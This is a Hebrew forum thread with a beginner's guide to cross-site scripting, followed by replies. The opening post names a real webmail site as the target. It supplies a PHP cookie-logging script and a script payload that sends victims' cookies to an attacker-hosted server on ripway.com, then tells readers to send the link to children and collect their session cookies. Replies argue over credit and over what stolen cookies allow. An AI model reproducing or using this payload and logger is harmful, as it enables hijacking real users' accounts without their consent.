קהילות פורומים, הורדות, יעוץ ותמיכה


אשכולות דומים

  1. [מדריך] HTML בסיסי למתחילים. מאד בסיסי - מאד פשוט .
    על ידי israeliviper בפורום שפות צד לקוח
    תגובות: 39
    הודעה אחרונה: 21-11-2012, 15:49
  2. [מכירה] מדריך html בסיסי לאלה שרוצים ללמוד|200 נ'ק
    על ידי XnArYaX בפורום מכירה
    תגובות: 2
    הודעה אחרונה: 23-09-2010, 21:33
  3. [פרסום] מדריך xss (סירטון)
    על ידי roee147 בפורום האקינג ואבטחת מידע
    תגובות: 5
    הודעה אחרונה: 22-09-2010, 01:51
  4. [מדריך] HTML בסיסי למתחילים. מאד בסיסי - מאד פשוט .
    על ידי israeliviper בפורום האקינג ואבטחת מידע
    תגובות: 23
    הודעה אחרונה: 13-03-2009, 16:56
+ תגובה לנושא
מציג תוצאות 1 עד 11 מתוך 11

מדריך xss(בסיסי)

  1. #1
    מורחקים
    תאריך הצטרפות
    09/2009
    הודעות
    513
    לייקים
    0
    נקודות
    103
    משפט מחץ
    כדי לילמוד לא לרמות!
    מין: זכר

    ברירת מחדל מדריך xss(בסיסי)

    שלום כולם החלטתי ליכתוב מדריך בנושא xss קצת לשנות בימקום כל הזמן sqli.

    קודם כל אני ממליץ קצת ליקרוא על xss נוכל להבין כי אני לא יסביר הכל אלה רק את הבסיס תחפשו חומר על זה בגוגל משהו.
    לאחר שאתם יודעים קצת על זה נוכל להמשיך במדריך:

    לצורך המדריך אני ידגים על וואלה. אוקי קודם כל מציאת חור xss איך מוצאים??
    כדי לימצוא חור xss אנחנו צריכים לחפש בכל מיני משבצות חיפוש הכוונה נגיד בהרשמה,חיפוש באתר ועוד.... נגיד בוואלה נלך לאפשריות קרא דואר ואז להרשמת חשבון חדש,נירשום את הקוד הבא במישבצת של שם מישתמש:
    קוד PHP:
    <script>alert("xss")</script> 
    לאחר שרשמנו זה יציג לנו חלון alert שבתוכו המילה xss זה אומר שיש חור xss עכשיו בטח מה שאתם רוצים לדעת איך נוכל לנצל אותו ומה ביכולתינו לעשות??
    לדוגמא אפשר לעשות דפייס ועוד כמה דברים אבל אני לא יפרט על הכל אני יסביר על גניבת הקוקיז של מישתמשים(עוגיות).
    איך בעצם ניגנוב את העוגיות?? ניפתח מסמך טקסט חדש ונירשום בו:
    קוד PHP:
    <?php
    $cookie 
    $_GET['c'];
    $ip getenv ('REMOTE_ADDR');
    $date=date("m/d/Y g:i:s a");
    $referergetenv ('HTTP_REFERER');
    $fl fopen('send.txt''a');
    fwrite($fl"\n".$ip.' :: '.$date."\n".$referer."\n".$cookie."\n");
    fclose($fl);
    ?>
    ניקרא לו test.php נכין מיסמך טקסט חדש וניקרא לו send.txt ונכניס בו את המילה bla נעלה את שני הקבצים לשרת האיחסון שלנו לדוגמא ripway
    עכשיו נחזור לוואלה ונכניס את הקוד הבא במקום שיש את הפריצה(במישבצת של שם מישתמש):
    קוד PHP:
    <script>document.location.href="www.example.co.il/test.php?cookie="+document.cookie</script> 
    עכשיו ב www.example.co.il תכניסו תכתובת של האיחסון של הקובץ test.php שהעלינו נגיד ב ripway סתם לדוגמא :
    קוד PHP:
    http://h1.ripway.com/myxss/test.php 
    אז נכניס את זה בקוד ככה:
    קוד PHP:
    <script>document.location.href="http://h1.ripway.com/myxss/test.php?cookie="+document.cookie</script> 
    לאחר שהכנסו את הקוד זה יעביר אותנו לדף שגונב עוגיות אתם כבר תיראו זה יעביר אותכם לדף ריק אם כתובת ארוכה אז אתם מעתיקים אותה ושולחים אותה לילדים וברגע שהם ניכנסו תיכנסו לקובץ send.txt ואתם תיראו תעוגיות שלהם(מישתמשים שלהם בוואלה)
    קרדיט לBuk4 על הקוד php(הקוד של ה send.txt) ועל הכנת המדריך קרדיט לי
    נערך לאחרונה על ידי roee147; 06-09-2010 בשעה 17:40.

  2. קישורים ממומנים

  3. #2
    משתמש מתחיל האוואטר של ttk650
    תאריך הצטרפות
    08/2010
    גיל
    30
    הודעות
    218
    לייקים
    0
    נקודות
    82
    מין: זכר

    ברירת מחדל

    תודה רבה אבל אתה יכול להסביר מה אפשר לעשות עם עוגיות?

  4. #3
    מורחקים
    שם פרטי
    דור
    תאריך הצטרפות
    07/2010
    גיל
    28
    הודעות
    762
    לייקים
    0
    נקודות
    114
    משפט מחץ
    Hacking is My Job
    מין: זכר

    ברירת מחדל

    תודה.

  5. #4
    משתמש מתחיל
    תאריך הצטרפות
    07/2010
    הודעות
    265
    לייקים
    3
    נקודות
    25
    מין: זכר

    ברירת מחדל

    ציטוט נכתב במקור על ידי ttk650 צפיה בהודעה
    תודה רבה אבל אתה יכול להסביר מה אפשר לעשות עם עוגיות?
    בשביל זה צריך לדעת תכנות.
    תלמד.
    רועי,
    מדריכים כאלו לא מועילים בכלל.
    תספר מה הקיצור של השם XSS.
    תספר ממה הוא נובע.
    איזה עוד שיטות ניצול יש עוד דרך XSS..
    והקוד PHP הוא שלי -_- אני הכנתי.
    מאבטח אתרים
    בונה אתרים
    הכל בפרטי.
    והכל בתשלום!

  6. #5

    ברירת מחדל

    נהוג לתת קרדיט על קודים עד כמה שאני זוכר, ואני מסכים עם בוקה בקשר למדריך עצמו, לא הסברת ממה זה נובע ועוד שיטות ניצול,

    ו XSS זה קיצור של - CROSS SITE SCRIPTING
    נערך לאחרונה על ידי xyossizx; 06-09-2010 בשעה 17:06.

  7. #6
    מורחקים
    תאריך הצטרפות
    08/2010
    הודעות
    207
    לייקים
    0
    נקודות
    0
    מין: זכר

    ברירת מחדל

    תודה רבה אחי!

  8. #7
    מורחקים
    תאריך הצטרפות
    09/2009
    הודעות
    513
    לייקים
    0
    נקודות
    103
    משפט מחץ
    כדי לילמוד לא לרמות!
    מין: זכר

    ברירת מחדל

    ציטוט נכתב במקור על ידי buk4 צפיה בהודעה
    בשביל זה צריך לדעת תכנות.
    תלמד.
    רועי,
    מדריכים כאלו לא מועילים בכלל.
    תספר מה הקיצור של השם XSS.
    תספר ממה הוא נובע.
    איזה עוד שיטות ניצול יש עוד דרך XSS..
    והקוד PHP הוא שלי -_- אני הכנתי.
    לא ידעתי שהקוד הזה שלך אבל נתנתי קרדיט למי שהביא תקוד

  9. #8
    משתמש מתחיל
    שם פרטי
    פז
    תאריך הצטרפות
    12/2009
    גיל
    30
    הודעות
    25
    לייקים
    0
    נקודות
    0
    מין: זכר

    ברירת מחדל

    תודה

  10. #9
    מורחקים
    תאריך הצטרפות
    05/2007
    הודעות
    81
    לייקים
    0
    נקודות
    0

    ברירת מחדל

    הוא לא שולח לי פרטים.. ניסיתי עכשיו על וואלה ..

  11. #10
    מורחקים
    תאריך הצטרפות
    05/2012
    הודעות
    190
    לייקים
    0
    נקודות
    0
    מין: זכר

    ברירת מחדל

    ציטוט נכתב במקור על ידי ttk650 צפיה בהודעה
    תודה רבה אבל אתה יכול להסביר מה אפשר לעשות עם עוגיות?
    עוגיות זה שם משתמש וסיסמא אתה יכול לגנוב חשבונות של אנשים

  12. #11
    משתמש מתחיל
    שם פרטי
    יובל
    תאריך הצטרפות
    12/2010
    הודעות
    449
    לייקים
    51
    נקודות
    75
    משפט מחץ
    אני רוט בנטורל - לא עושה דיפייס בכלל! 3>
    מין: זכר

    ברירת מחדל

    ציטוט נכתב במקור על ידי ooom צפיה בהודעה
    עוגיות זה שם משתמש וסיסמא אתה יכול לגנוב חשבונות של אנשים
    פשי, הקפצה של 24 חודשים. סחטיין!
    ואיזה מתכנת מפגר דוחף סיסמא לתוך עוגיה? שם משתמש + סיישן מאומת עם שרת.

    סקייפ: niki-k1ng79 | סטים (Steam)
    Rainbow_Dash | Th3PonyWizard
    /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/

+ תגובה לנושא


הרשאות פרסום

  • אין באפשרותך לפרסם נושאים חדשים
  • אין באפשרותך לפרסם תגובות
  • אין באפשרותך לצרף קבצים
  • אין באפשרותך לערוך את הודעותיך


כל הזמנים הם לפי GMT +3. השעה כרגע היא 01:54.
מופעל על ידי vBulletin™ © גרסה 4.1, 2011 vBulletin Solutions, Inc. כל הזכויות שמורות.
פעילות הגולשים
אומנות וגרפיקה
מוזיקה
ספורט
סדרות טלוויזיה
סרטים וקולנוע
קנייה ומכירה
רשתות חברתיות
הבורר 3
פורומי פנאי ובידור
סרטים
סדרות
משחקים
דיבורים
אקטואליה
בעלי חיים
בדיחות והומור
משחקי ספורט
הבורר
מחשבים וטכנולוגיה
תמיכה טכנית
חומרה ומודינג
תוכנות להורדה
סלולארי וגאדג'טים
רקעים למחשב
ציוד הקפי למחשב
אבטחת מידע
תכנות ובניית אתרים
כסף ברשת
אייפון
בריאות ואורח חיים
כושר ופיתוח גוף
דיאטה
צבא וגיוס
יעוץ מיני
מה שבלב
אומנות הפיתוי
יהדות
מיסטיקה ורוחניות
אתאיזם ודתות

נושאים: 2,449,538 | הודעות: 8,150,120 | משתמשים: 315,603 | המשתמש החדש ביותר: upizijoj | עיצוב גרפי: סטודיו עודד בביוף | קידוד: rellect